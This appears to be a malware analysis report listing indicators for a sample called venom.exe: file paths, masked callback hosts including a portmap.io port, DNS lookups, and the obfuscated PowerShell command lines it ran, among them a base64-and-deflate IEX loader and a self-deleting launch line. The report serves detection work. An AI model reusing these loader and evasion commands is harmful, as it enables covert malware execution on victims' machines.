Technical Information
- <Current directory>\venom.exe
- %APPDATA%\logs\04-04-2022
- 'ip##pi.com':80
- 'mi#####9958.portmap.io':39958
- http://ip##pi.com/json/
- DNS ASK ip##pi.com
- DNS ASK mi#####9958.portmap.io
- '<Current directory>\venom.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -command "&{IEx( nEW-ObJECT systeM.Io.COMpRESSION.DEFLAtEStreAm([IO.MEmorYStrEaM][SYSTem.coNvERt]::FrOMbaSE64sTriNG('HYw9D8IgEED/Clsn48Lg+iAGa+LA4EBHKMEPao1a+/flnF7u3r1L06i2SXXPec...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "&{IEx( nEW-ObJECT systeM.Io.COMpRESSION.DEFLAtEStreAm([IO.MEmorYStrEaM][SYSTem.coNvERt]::FrOMbaSE64sTriNG('HYw9D8IgEED/Clsn48Lg+iAGa+LA4EBHKMEPao1a+/flnF7u3r1L06i2SXXPec2v9yXXqjb5kVRY...
- '<SYSTEM32>\cmd.exe' /c "powershell -enc YwBtAGQAIAAvAGMAIAAiAEAAZQBjAGgAbwAgAG8AZgBmACAAJgAmACAAdgBlAG4AbwBtAC4AZQB4AGUAIAAmACYAIABkAGUAbAAgAHYAZQBuAG8AbQAuAGUAeABlACIA"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc YwBtAGQAIAAvAGMAIAAiAEAAZQBjAGgAbwAgAG8AZgBmACAAJgAmACAAdgBlAG4AbwBtAC4AZQB4AGUAIAAmACYAIABkAGUAbAAgAHYAZQBuAG8AbQAuAGUAeABlACIA
- '<SYSTEM32>\cmd.exe' /c "@echo off && venom.exe && del venom.exe"